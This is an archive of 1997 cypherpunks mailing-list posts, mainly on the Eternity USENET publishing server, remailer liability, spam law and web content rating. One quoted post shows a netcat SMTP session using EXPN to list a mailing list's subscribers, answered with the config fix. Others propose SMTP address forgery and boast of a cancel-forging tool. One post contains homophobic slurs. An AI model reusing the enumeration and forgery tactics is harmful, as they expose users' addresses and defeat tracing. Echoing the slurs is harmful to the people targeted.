> users to change their eternity URLs on a regular basis.

Two comments on this:

- I understand cancels are ignored a lot of places, due to problems with
  censorous people, and pranksters issuing tons of forged cancels.
  These censorous people are actually doing us a big favour because it
  is their actions which has led to the widespread policy of ignoring
  cancels.

  However this is going on other peoples information.  I don't have
  any figures for how widespread the practice of configuring news to
  ignore cancels is.  

  Perhaps we could do a little experiment here, you (or someone who
  has the tools/knowhow handy try cancelling the dozen or so eternity
  articles in alt.anonymous.messages, and we'll have a little survey
  amongst list readers as to how well the cancels work.

- Comment #2.  The eternity servers have caches.  They cache
  documents. (This is configurable).  There is currently no cache
  replacement policy because I haven't got around to it yet.  So
  currently once viewed the docs stay there forever.  (When I do get
  around to cache a replacement policy it will be either least
  accessed, and/or lowest ecash payment).

I'm however not so keen to promote the idea that actually the docs you
are looking at are coming off the servers cache because it's nicer to
leave them presuming it was just read off the NNTP server right then
(which it can be at the moment).
   
It's a two stage process at the moment:

   - server reads news at some chosen internval and creates database
     of article number, subject field, and message-id field for
     subject fields which look like eternity documents.

   - some user comes along and types a URL which matches the chosen
     hash.  Server fetches document from NNTP or local news spool
     using the article number as looked up in the database.  Depending
     on the eternity.conf setting for cacheing (on/off/encrypted) and
     the document setting (on/off/encrypted) the document will be
     either not cached, cached in clear, or cached in encrypted form
     (with sha1( 1 ) where  is the url of the document).

I could change it to a single stage process so that eternity documents
are immediately cached.  This is something easy to change, which could
be done if people got trigger happy with cancels and it was affecting
things.  Then you would be left with cancel wars :-) The eternity
server would grab the article at first opportunity though.

Later versions of the software will have to exchange documents
somehow, so then as long as one server saw the document before someone
cancelled it you'd be ok.

Clearly you could have an email submission channel where you just
email the article to a server, but that gets away from the idea of
pointing the finger at USENET.  (Cacheing is somewhat protected in
legislation even, because it's just a USENET document, and all you're
doing is cacheing it according to some cache replacement policy).

Some more technical explanations of what's going on encryption wise,
is that articles in the news spool have an outer encryption layer
which encrypts in one of these two ways:

   1) with pgp -c and password "eternity"

   2) with pgp -c and password of sha1( "1" ) 
      where url is the document url

Inside this encryption layer is the document options (document url,
per document cacheing policy, and a marker of whether the document is
exdirectory or not (exdirectory docs not listed on document list).
Plus an optional pgp key, and the ascii armored, optionally signed
document.

There is an optional inner layer of encryption, the ascii armored
signed document can optionally be encrypted:

   3) using a user selected passphrase

Option 1) provides little more protection than rot-13.  But should be
of some use in that it prevents the less clued from reading the
documents out of USENET directly.

Option 2) means that you need to know the URL before you can access
the document.  Without the URL, you're hosed.

Perhaps the URL is easy to guess, perhaps it's not:

	http://warez.eternity/safuwerqwkesadfiqwerdsf/

Option 3) means that you need the passphrase to read the document in
addition to the URL.  This has similar effect to having a garbled URL,
choose a hard to guess passphrase.

You can turn on SSL at the eternity server, but that means you're
still trusting the operator, and root on the system.

To do it properly, you'll need a local eternity server if you want to
good security of encrypted documents.  Easy enough to run a local
eternity server if you're using linux on a ppp or permanently
connected machine.  My development machine is a ppp connected linux
machine.

However I'm not sure having passphrases is that good of an idea,
because it'll be furtively passed around amongst the community of the
person who submitted the documents, but that can always leak out.

And people using non-local eternity servers will be revealing the
shared passphrase to the server admin, (and to the snooping world, if
the server isn't running with SSL turned on).

> It also doesn't provide true security, since when someone sets up an 
> illegal site the gubment can find the messages on Usenet, decrypt them, 
> and then threaten the remailer operator who posted them.

Turn of logs, and introduce forward secrecy into mixmaster.  Easy to
do.  Why don't we have it yet?  (Ulf?  Lance?)

Then you have as true security as you can get from a digital mix with
the parameters mixmaster has.

Don't do too many regular updates of your eternty web pages for very
high risk situations.  Engineered network outages could show you up
quickly even if you were using a DC-net covering 1 million users.

> I understand that this is just an alpha release, but I don't see any
> obvious way to fix these problems with a Usenet-based system. 

Does the above answer your concerns about security?

Medium term software development-wise the eternity servers are going
to have to exchange documents between themselves.  At that point
USENET will be functioning mostly as hard to tamper with distribution
channel.  The rest will be a distributed USENET caching system, with
cache policy determined by popularity of document (hit count), and by
ecash payment.

Longer term perhaps some of Ross Anderson's more advanced ideas can be
added, as discussed by Ryan Lackey in the thread entitled "distributed
data store, a la eternity".

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: 




On Wed, 6 Aug 1997, Adam Back wrote:

>   However this is going on other peoples information.  I don't have
>   any figures for how widespread the practice of configuring news to
>   ignore cancels is.  

Ditto. We'd have to assume that it's pretty widespread to avoid these 
problems.
 
> To do it properly, you'll need a local eternity server if you want to
> good security of encrypted documents. 

I'd assume that in the end this is what most people would do; get a Usenet
feed and run a server locally so that noone knows which URLs you're
accessing. 

> Turn of logs, and introduce forward secrecy into mixmaster.  Easy to
> do.  Why don't we have it yet?  (Ulf?  Lance?)
> 
> Then you have as true security as you can get from a digital mix with
> the parameters mixmaster has.

That's not what I meant; I'm assuming that the mixmaster chain is pretty
secure. The problem is that when the government find 'nuclear terrorist
money-laundering kiddie drug porn' on the Eternity server they can trace
it back to the original Usenet message and then go after the remailer
operator who posted it. Making the remailers disposable or setting them up
in free countries would work, but I'd prefer a technical solution. 

	Mark






From dlv at bwalk.dm.com  Wed Aug  6 07:30:34 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 6 Aug 1997 22:30:34 +0800
Subject: Eternity Uncensorable?
In-Reply-To: <199708061308.OAA02171@server.test.net>
Message-ID: <1PP1ae8w165w@bwalk.dm.com>



Adam Back  writes:

> Mark Grant  writes:
>
> > so all that a government need do to censor a particular site is to
> > scan for those messages and issue cancels. Sure, your site and those
> > upstream may not accept such messages, but potentially they can
> > still wipe out a large fraction of the system or at least force
> > users to change their eternity URLs on a regular basis.
>
> Two comments on this:
>
> - I understand cancels are ignored a lot of places, due to problems with
>   censorous people, and pranksters issuing tons of forged cancels.
>   These censorous people are actually doing us a big favour because it
>   is their actions which has led to the widespread policy of ignoring
>   cancels.

Yep. (I hope my making available an easy-to-use program for foring cancels
helped a little too, he he he.)

>   However this is going on other peoples information.  I don't have
>   any figures for how widespread the practice of configuring news to
>   ignore cancels is.

Major ISPs (America Online, Netcom, Earthlink..) all ignore cancels.
More precise numbers would be interesting.

> However I'm not sure having passphrases is that good of an idea,
> because it'll be furtively passed around amongst the community of the
> person who submitted the documents, but that can always leak out.

I can't think of a clever way to use public keys (and don't think this
is a good idea anyway)

> Longer term perhaps some of Ross Anderson's more advanced ideas can be
> added, as discussed by Ryan Lackey in the thread entitled "distributed
> data store, a la eternity".

Adam, you're doing a great job. Can I buy you a dinner when I'm in London?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From dlv at bwalk.dm.com  Wed Aug  6 07:36:55 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 6 Aug 1997 22:36:55 +0800
Subject: JYA Up
In-Reply-To: 
Message-ID: 



? the Platypus {aka David Formosa}  writes:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> On Tue, 5 Aug 1997, Dr.Dimitri Vulis KOTM wrote:
>
> > I urge you to find a more honorable upstream provider.
> > Preferrably someone who gets connectivity off of AGIS, who doesn't
> > censor content.
>
> You don't get connectivity off of AGIS becuase no-one connnects.  AGIS'
> routers ect are so misconfigered ect that pagets seem to move threw it
> more by coninicdence then anything else.

(I'm trying to reply to my incoming mail in the order it was received,
still doing last weekend's mail, but I'll make an exception.)

David, it's remarks like these that cause people to conclude that you're
not very bright.  I'm not a customer of AGIS or any of its downstreams,
and I get excellent connectivity to their sites.  I remind the readers
that certain groups on Usenet hate AGIS because of their refusal to
censor content. E.g. read the Net.Scum page for Debbie Taylor to read
how the homos tried to censor the Web site called "www.gothatesfags.com"
and how AGIS refuses to bend over.  For this reason, homos (is David one?)
spread lies ike the above about AGIS, using meaningless technical jargon
and implying that that it doesn't work properly, But the fact is that the
recent study by the Boardwatch magazine ranked AGIS's network third best
among major backbones. (It would be first best of they ranked their
commitment to freedom of speech.)

More power to Phil Lawlor and death to all censors!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps






From Selective.Marketing at kmeijn  Wed Aug  6 22:39:38 1997
From: Selective.Marketing at kmeijn (Selective.Marketing at kmeijn)
Date: Wed, 6 Aug 1997 22:39:38 -0700 (PDT)
Subject: WANNA PLAY VIRTUAL FOOTBALL?
Message-ID: <1997031600.GAA08056@bigfoot.com>


WANNA PLAY FOOTBALL? 

Come play Virtual Football where you create your own team.

This site is endorsed by the National Football League.

If you would like more information about playing Virtual Football,

please send your request to  and the 

information will be forwarded to you in just a few short moments.





From kent at songbird.com  Wed Aug  6 08:14:49 1997
From: kent at songbird.com (Kent Crispin)
Date: Wed, 6 Aug 1997 23:14:49 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: <199708030302.XAA08565@cti06.citenet.net>
Message-ID: <19970806075802.12530@bywater.songbird.com>



On Sun, Aug 03, 1997 at 12:29:37PM +0100, Adam Back wrote:
> Here's the sequence of events as I see it:
> 
>  1. spammer spams you with adverisement for phone sex line
>  2. you try to sue phone sex line company
>  3. phone sex company denies all knowledge
>  4. government says all email must be authenticated 
>  5. government issues internet drivers license
>  6. anonymous remailers work around authentication requirement
>  7. government outlaws remailers
> 
> See any flaws in that logical and undesirable sequence of events?

The flaws become apparent if you try to attach a *realistic*
probability to each step.

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From aba at dcs.ex.ac.uk  Wed Aug  6 09:41:53 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Thu, 7 Aug 1997 00:41:53 +0800
Subject: Eternity Uncensorable?
In-Reply-To: <199708061308.OAA02171@server.test.net>
Message-ID: <199708061539.QAA02852@server.test.net>




To follow up to my own post briefly, I said:

: Clearly you could have an email submission channel where you just
: email the article to a server, but that gets away from the idea of
: pointing the finger at USENET.

If the machine hosting the eternity server also has a mail2news
gateway (eg replay has mail2news at replay.com), then modify the
mail2news program to forward a copy to eternity at replay.com for
newsgroups that the eternity server is interested in.

That way it's still a USENET post.  Just you're stacking the odds
against the cancel forger :-) The cancel forger can't get there before
you unless he can read your mind (or your email), but it wouldn't
matter if he could, because eternity would see the document anyway.

http://www.replay.com/aba/eternity/ is reading it's news from
nntp:news.xs4all.nl, but I don't know what their cancel settings are
for their news spool.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: 



On Tue, 29 Jul 1997, Harry Tuttle Remailer wrote:

> Its pretty straightforward for interested perties to get a list of everyone
> on a mojordomo mailinglist even if the who command is disabled as long as
> we have our old friend sendmail and his trusty sidekick expn.
> 
> nc toad.com 25
> 
> 220 toad.com ESMTP Sendmail 8.7.5/8.7.3;
>  Tue, 29 Jul 1997 12:59:12 -0700 (PDT)
> expn cypherpunks
> 250-<"|/u/majordom/bin/wrapper resend -p bulk  -l cypherpunks -f
> owner-cypherpunks-unedited -h toad.com -s 
> cypherpunks-unedited-outgoing"@toad.com>

if toad.com modified /etc/sendmail.cf to include:

Opnoexpn,novrfy

this wouldn't work. not much of a big mystery there...

---
John Adams -=- Computer Specialist & Network Guru  O-  NADEP Cherry Point
Pensacola Florida   +1.904.452.8551 DSN:922-8551  jadams at seahawk.navy.mil
PGP ID 0x9081AF16 via key server - opinions expressed are entirely my own






From aba at dcs.ex.ac.uk  Wed Aug  6 10:42:01 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Thu, 7 Aug 1997 01:42:01 +0800
Subject: Eternity Uncensorable?
In-Reply-To: 
Message-ID: <199708061632.RAA03261@server.test.net>





Mark Grant  writes:
> On Wed, 6 Aug 1997, Adam Back wrote:
> > To do it properly, you'll need a local eternity server if you want to
> > good security of encrypted documents. 
> 
> I'd assume that in the end this is what most people would do; get a Usenet
> feed and run a server locally so that noone knows which URLs you're
> accessing. 

Indeed.  

Similar perhaps to web based remailer interfaces, you can turn on SSL,
but you're still trusting the server, relying on no hackers being able
to crack it, and relying on your estimate of the authenticity of it's
certificate

If there got to be a _lot_ of eternity documents this might get
impractical.  You wouldn't have the disk space for them all.

The distributed USENET cacheing setup could use cope with a big
archive because the content could also be distributed, and forwarded
on request.  So the complexities of doing something clever to allow
digital mixes to obscure your reading habits might come in again.

Incidentally, I think you could use the same methods to obscure
reading the virtual eternity web as you would use to obscure reading
the real web.  Eg. crowds, www.anonymizer.com.  http://*.eternity/
just happens to be likely to end up hosting a load of "hot" stuff
which you might not want to be caught reading in some countries.

> > Turn of logs, and introduce forward secrecy into mixmaster.  
> 
> That's not what I meant; I'm assuming that the mixmaster chain is
> pretty secure. The problem is that when the government find 'nuclear
> terrorist money-laundering kiddie drug porn' on the Eternity server
> they can trace it back to the original Usenet message and then go
> after the remailer operator who posted it. 

They might have a go at that yes.

> Making the remailers disposable or setting them up in free countries
> would work, but I'd prefer a technical solution.

That _is_ the technical solution!  (Disposable remailers).

Here's a repost of something I posted to remailer-ops on this topic at
around the time a few remailer operators felt the heat.  Nothing new
proposed, but this kind of argument was being hashed out here on
cypherpunks years ago, and we still don't have any disposable
remailers.  As close as we've got that I know is perhaps some
psuedo-anonymous remailer operators running off of cyberpass (Lance
offers anon shell accounts for ecash).

Adam

remailer-ops repost:
======================================================================
From: Adam Back 
To: mail2news at anon.lcs.mit.edu
Cc: remailer-operators at anon.lcs.mit.edu
Subject: disposable camouflaged tents (was Re: Balls remailer under attack.)
In-reply-to: <199706291539.RAA15722 at basement.replay.com> (nobody at REPLAY.COM)
Date: Sun, 29 Jun 1997 23:45:40 +0100


Anonymous writes:
> I'm not sure that's a wise precedent to set.  Once you put the
> self-appointed censors and netcops in the driver's seat, who's to say
> where they might take us?

Agreed.

> [description of censors tatics]
>
> Maybe it's time that the censors were told to keep their noses out
> of our tents, for, like a camel, once you let it put its nose under
> the side of your tent, you soon have the entire camel taking over
> your tent!  Maybe it's time to bop a few intruding noses!

The solution is to have disposable tents, lots of.

What about AOL disks?  We need shorter lived, disposable remailers as
exit remailers...  Let them take the heat, while the real remailers
walk.  Lets see a series of "exitman" remailers.  Exitman remailers
are walking targets left to fend for themselves as long as they may.

I propose that an exit remailer is replaceable, that is another
remailer can instantly step into it's place and take traffic.  The way
to do this is to have a special automated reporting mechanism for
exitman remailers.  An easy way to do it is to have the exitman
remailers send mail to a given mailing list.  Other remailers which
wish to use exitman remailers just subscribe to the chosen mailing
list.  We just need a remailer command indicating the creation of a
new exitman remailer.  I guess the exitman remailer just sends one
message per day, or whatever, and if it stops, you write it off.

Is there a military term for something sent in to get shot to bits,
just to distract attention from other movement?  A decoy?


Also, what about camouflaging the disposable tent, so the camal can't
find it to poke it's nose in?  How about SMTP mail forgeries.
Wouldn't addresses of remailer42 at dev.null fool a lot of these censorous
people?

I wonder if system admins in general would be very interested in
tracking down SMTP forgeries for censors?  If it was obvious what the
censorous shill was up to, or the large ISP sysadmin was just plain
overloaded with work he may just shrug his shoulders and say sorry,
can't be traced, get over it.

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: 



On Wed, 6 Aug 1997, Adam Back wrote:

> Mark Grant  writes:
> > On Wed, 6 Aug 1997, Adam Back wrote:
> > > To do it properly, you'll need a local eternity server if you want to
> > > good security of encrypted documents. 
> > 
> > I'd assume that in the end this is what most people would do; get a Usenet
> > feed and run a server locally so that noone knows which URLs you're
> > accessing. 
> 
> Indeed.  
> 
> Similar perhaps to web based remailer interfaces, you can turn on SSL,
> but you're still trusting the server, relying on no hackers being able
> to crack it, and relying on your estimate of the authenticity of it's
> certificate
> 
> If there got to be a _lot_ of eternity documents this might get
> impractical.  You wouldn't have the disk space for them all.

This is where I see a problem with eternity servers.

If I were going to attack such a system, I would just start to have the
eternity servers store my core files or some other junk.  (Or maybe feed
it the SIMTEL or funet.fi archives.) Enough crap so that you could not
have enough space to store the real important stuff...

And then, if anyone did delete it out of the Eternity server(s), I would
yell "censorship" to the freedom knights and/or their fellow travelers...

alan at ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.






From apache at bear.apana.org.au  Wed Aug  6 11:30:33 1997
From: apache at bear.apana.org.au (Charles)
Date: Thu, 7 Aug 1997 02:30:33 +0800
Subject: bulk postage fine (was Re: non-censorous spam control)
In-Reply-To: <19970806075802.12530@bywater.songbird.com>
Message-ID: <199708061713.DAA09431@bear.apana.org.au>



-----BEGIN PGP SIGNED MESSAGE-----


    Kent Crispin said:

>On Sun, Aug 03, 1997 at 12:29:37PM +0100, Adam Back wrote:
>> Here's the sequence of events as I see it:
>> 
>>  1. spammer spams you with adverisement for phone sex line
>>  2. you try to sue phone sex line company
>>  3. phone sex company denies all knowledge
>>  4. government says all email must be authenticated 
>>  5. government issues internet drivers license
>>  6. anonymous remailers work around authentication requirement
>>  7. government outlaws remailers
>> 
>> See any flaws in that logical and undesirable sequence of events?
>
>The flaws become apparent if you try to attach a *realistic*
>probability to each step.

Wasn't the UPS trying to promote some system of authentication (where you 
pay just as like you purchase postage stamps now) at a trade show of some 
description in the US this year or late last year? I recall a post on 
this to this list but can't recall the detail. Anyone recall the details 
of that post?

I know last year the australian post office suggested such a role for 
themselves and they didn't see it as a voluntary proposal. I haven't 
heard anything from them lately so maybe it was all just too difficult.

- -- 
   .////.   .//    Charles Senescall             apache at bear.apana.org.au
 o:::::::::///     PGP mail preferred            apache at quux.apana.org.au
>::::::::::\\\     Finger me @bear for PGP PUBKEY      Brisbane AUSTRALIA
   '\\\\\'   \\    Apache



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBM+iwwXawhvoxf0r9AQGnTwf/ZvFB+PlCUqiNvXoPmkhDSw3YlBfOjpW2
4JnOeKA3kLys23FMKvSeNd1BulrKhVwVZGpGHCsOS7/aiyxvshZb3Mjakw20mV6Z
O0gy/Si1yOLVk65e3vXWsn78xPdfXmvTEdwiFEGT3/HvICzuWzfbUIJkhdmDXK3j
D8uXE+p97NYyMscg1+qlZzD3D4uIl5jwht/giu+ztVtjJgGYqmMk4z9WZ3Vk245N
RAYhF3zgeJz/cTxNTTlT8v05kbJOcZJJlRHMLE3BlCSSY338hnXuodttc54JEoEZ
Gb04DO12bphTW2sdIqdxmQY9jjAxlO10w3CHlzuB2G05x/lyakScWg==
=lS/d
-----END PGP SIGNATURE-----






From aba at dcs.ex.ac.uk  Wed Aug  6 11:33:34 1997
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Thu, 7 Aug 1997 02:33:34 +0800
Subject: anti-spam law implies laws against remailers? (was Re: bulk postage fine)
In-Reply-To: <19970806075802.12530@bywater.songbird.com>
Message-ID: <199708061705.SAA03362@server.test.net>




Kent Crispin  writes:
> On Sun, Aug 03, 1997 at 12:29:37PM +0100, Adam Back wrote:
> > Here's the sequence of events as I see it:
> > 
> >  1. spammer spams you with adverisement for phone sex line
> >  2. you try to sue phone sex line company
> >  3. phone sex company denies all knowledge
> >  4. government says all email must be authenticated 
> >  5. government issues internet drivers license
> >  6. anonymous remailers work around authentication requirement
> >  7. government outlaws remailers
> > 
> > See any flaws in that logical and undesirable sequence of events?
> 
> The flaws become apparent if you try to attach a *realistic*
> probability to each step.

Difficult to do.

However, consider:

1) Government anti-spam laws won't work (too many loop holes, #1 of
   which is there are other countries in the world other than US, #2 is
   remailers will be used which will leave remailer operator rather than
   spammer to face the music).

2) When the government or whoever wants to sue someone for spam they
   will have to prove who the spammer is.  (Right?)  So now they'll
   look at the From address at it will say remailer at foo.com.  So
   they'll go have a chat to Fred Q Cypherpunk who operates foo, and he
   won't be able to cooperate because he doesn't keep logs.  They won't
   be happy with Fred, and will pass this information along to him by
   stealing his equipment, prosecuting him for assisting in a felony
   crime (they'll make it a felony right?), lock him and throw away
   the key.  But what about Freds constitutional protection of the
   speech forwarded by his remailer?  (Judge + congress-critter:
   Constitution wassat?)

3) Repeat step 2 x 100 and "something will have to be done" about the
   remailers (if there are any left!)  It really isn't that far
   fetched to have laws against remailers in the US.  Not so long ago
   the guy from the two-man band Georgia EFF were telling us about how
   they fought some law which had already tried to do this in that
   state.

4) New laws nearly always reduce your freedoms - in phrasing the law,
   and compromising their way around whatever "issues" they try to
   construct, they'll try to hide something else in there which we don't
   want.  (eg no encrypted email, or no import of crypto, or something
   stupidly unrelated -- happens all the time).

5) It's the net man, what do you want government officials crawling all
   over it, and lawyers arguing about it's content for?  It sets a bad
   precedent.

ps Kent, did you convert your rsa.midi to a .au file?  I haven't got
my /dev/midi configured properly under linux, but can play .au files,
and am dying to hear it :-)

Adam
-- 
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0
Message-ID: 



On Wed, 6 Aug 1997, Mark Grant wrote:

> That's not what I meant; I'm assuming that the mixmaster chain is pretty
> secure. The problem is that when the government find 'nuclear terrorist
> money-laundering kiddie drug porn' on the Eternity server they can trace
> it back to the original Usenet message and then go after the remailer
> operator who posted it. Making the remailers disposable or setting them up
> in free countries would work, but I'd prefer a technical solution. 

I suggest using information dispersal to spread risk amongst remailer
operators.  Use Rabin's information dispersal technique to divide up a
document into n shares such that k of them can reconstruct the original,
and post each share via a seperate remailer.  It would be hard for the
government to single out an operator to go after since an individual share
by itself is useless.

If n>k this also increases reliability and resilience of the eternity
service against technical attacks.






From jim.burnes at ssds.com  Wed Aug  6 12:04:48 1997
From: jim.burnes at ssds.com (Jim Burnes)
Date: Thu, 7 Aug 1997 03:04:48 +0800
Subject: "Voluntary Censorship" vs. Govt Legislation
Message-ID: <33E8C4FA.3E6DDBAC@ssds.com>



Chris:

Considering the volume of email you're

receiving on this topic, I doubt that you

will get around to reading this letter.

But for what its worth, the whole idea

of heading off Federal legislation by

policing ourselves is surrendering everything

that we've won from the defeat of the

British in 1776 to the defeat of the CDA.

(a slight overstatement seeing that the

Brits don't seem to have Parliment passing

CDA laws)

Can you imagine going into a library and

having censorship ratings stamped on the

bindings of all the books there?  The

very thought nearly brings tears to my eyes.

Last week I watched Farenheit 451 and

realized how close we are coming to that

sort of society.

If people want their information censored

then they should "donate" money to their

church and have it write filtering software.  This

would be a great way for churches to make

money -- all tax free.  Chances are that

people would be able to find a church that

agrees with their tastes in censorship.  They

may even attend that very organization.

Think about it!  Rather than bland names

such as CyberSitter or NetCop or whatever

you would have a "Parish Priest" that filters

all references to clerical pedophilia, a "Rabbi

Goldberg" that bans everything it considers anti-

semitic and a "Baptist Minister (southern edition)"

that pretty much bans... well .. a lot.  Microsoft

has been trying to sell user agents for a while.  This

would beat the hell out of Bob.  Someone might actually

use it!  You would know exactly what you were getting

and people won't usually sue their church if they should

happen to miss a nasty URL once in a while.

The church agents could also keep a tally of all the

bad information the kids had been protected from and

the nature of the information -- just in case the 'rents

need to save them from mortal peril.

As for the concept of an RSACi rating

for "news sites" that are "officially approved"

I can only say this is the most Orwellian proposal

so far.  After fifty-plus-years of "official"

news I'd say that most people have had a

belly full.  The pure arrogance of such an idea

is simply repulsive.  To call this hypocrisy would

be a affront to hypocrits everywhere.

Rather than discussing this issue with the

government I suggest you take it to a council

of churches where it belongs and not the Feds.

The last time the Feds staged a morality

play they burned twenty children to death.

For an example of how well the media served

the people during that "rescue attempt" I refer

you to charred corpses of little girls at Public

Affair's Waco Holocaust Museum at:

http://www.mnsinc.com/SkyWriter/WacoMuseum/

Would Public Affairs get an official

"news site" stamp of approval?  I thought

not.


---------------------------------------
When the world is running down
   make the best of what's still around
                                -sting








From declan at well.com  Wed Aug  6 12:36:46 1997
From: declan at well.com (Declan McCullagh)
Date: Thu, 7 Aug 1997 03:36:46 +0800
Subject: Query on cookies
Message-ID: 



Does anyone have a detailed understanding of how cookies work? I've read
Netscape's explanation of the protocol, but I still have some questions.

-Declan







From dformosa at st.nepean.uws.edu.au  Wed Aug  6 13:25:43 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Thu, 7 Aug 1997 04:25:43 +0800
Subject: Eternity Uncensorable?
In-Reply-To: <199708061308.OAA02171@server.test.net>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 6 Aug 1997, Adam Back wrote:

> Mark Grant  writes:

[...]

> > so all that a government need do to censor a particular site is to
> > scan for those messages and issue cancels.

> - I understand cancels are ignored a lot of places, due to problems with
>   censorous people, and pranksters issuing tons of forged cancels.

And alot like to use canceles.  If censorus groups (not neccery the
goverment) starts canceling we may be able to create a resector like that
used in news.admin.net-abuse.*

[...]

>   I don't have any figures for how widespread the practice of
>   configuring news to ignore cancels is.  

Most sites still hounder cancels,  a growing number ignore them (often for
preformence resons).

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+ifYqQK0ynCmdStAQEhzwQAnw82Mk6XNlvQRUGVDVsBW63vOkFBZDV/
oLz3BUFTnrn4mHZxwuU2s+j1O2s7aLZP/ImD69XePILqKJDYiMJ6A6nc0reirNZ0
6WlkPl6jgpqWL8SKNidisjDWmwMXoYdkE6HSUB2rGoLgrtzvw4RXc6XcnQcG2Zb0
b8andhqfeTs=
=POHl
-----END PGP SIGNATURE-----






From dformosa at st.nepean.uws.edu.au  Wed Aug  6 13:36:30 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Thu, 7 Aug 1997 04:36:30 +0800
Subject: distributed data store, a la eternity
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 6 Aug 1997, Dr.Dimitri Vulis KOTM wrote:

[...]

> However Dejanews doesn't process cancels.

However Dejanews dose not store binaries.  I do not know if there filters
consider PGP ascii armor as a binarie.  So Dejanews may not store the
cancels.  You could try and get it of a "Site of vertue" or jetcafe.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+igxqQK0ynCmdStAQFCOQQAlGLR9crVoAnQTPQcPlkucycvmU1DeXTC
4BQ4Fnpj8WkGstqTyh9cxdFVql8ShcCmwqF7aBISgdd/nVpIl/IX3j02N/1zYbfS
pLGlAganvBJA+YMqnspJSIgk+8oLONqaIYfpZIzAGT662QY2BPtjycpSHa5heHCy
bHk/E6qtAzQ=
=9Uc7
-----END PGP SIGNATURE-----






From kent at songbird.com  Wed Aug  6 14:45:05 1997
From: kent at songbird.com (Kent Crispin)
Date: Thu, 7 Aug 1997 05:45:05 +0800
Subject: "Voluntary Censorship" vs. Govt Legislation
In-Reply-To: <33E8C4FA.3E6DDBAC@ssds.com>
Message-ID: <19970806141137.51900@bywater.songbird.com>



On Wed, Aug 06, 1997 at 12:39:54PM -0600, Jim Burnes wrote:
[...]
> Can you imagine going into a library and
> having censorship ratings stamped on the
> bindings of all the books there?

This is not a good analogy at all.  Have you ever noticed that there
are "childrens books" sections in the library? In fact, books in
libraries *do* have ratings -- they just use a different technique
than stamping it on the book.

The fact is that realspace allows categorization (censorship, in your
terminology) by spatial location -- something that cyberspace doesn't
support.  You don't complain about physical segregation of children's books,
or keeping children out of bars.

So presumably you wouldn't complain about some technical means of
creating an analog in cyberspace?

If so, then voluntary labelling is not so bad.  Most sites that cater 
to "adult" tastes will label themselves; most sites that explicitly 
cater to children will label themselves; but the vast majority of 
sites won't bother.  The fact that this system is not perfect is not 
an issue -- realspace separation is not perfect either.

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From jim.burnes at ssds.com  Wed Aug  6 16:09:23 1997
From: jim.burnes at ssds.com (Jim Burnes)
Date: Thu, 7 Aug 1997 07:09:23 +0800
Subject: "Voluntary Censorship" vs. Govt Legislation
In-Reply-To: <33E8C4FA.3E6DDBAC@ssds.com>
Message-ID: <33E8FE38.476CD40@ssds.com>



Kent Crispin wrote:

> On Wed, Aug 06, 1997 at 12:39:54PM -0600, Jim Burnes wrote:
> [...]
> > Can you imagine going into a library and
> > having censorship ratings stamped on the
> > bindings of all the books there?
>
> This is not a good analogy at all.  Have you ever noticed that there
> are "childrens books" sections in the library? In fact, books in
> libraries *do* have ratings -- they just use a different technique
> than stamping it on the book.
>
> The fact is that realspace allows categorization (censorship, in your
> terminology) by spatial location -- something that cyberspace doesn't
> support.  You don't complain about physical segregation of children's
> books,
> or keeping children out of bars.
>
> So presumably you wouldn't complain about some technical means of
> creating an analog in cyberspace?
>
> If so, then voluntary labelling is not so bad.  Most sites that cater
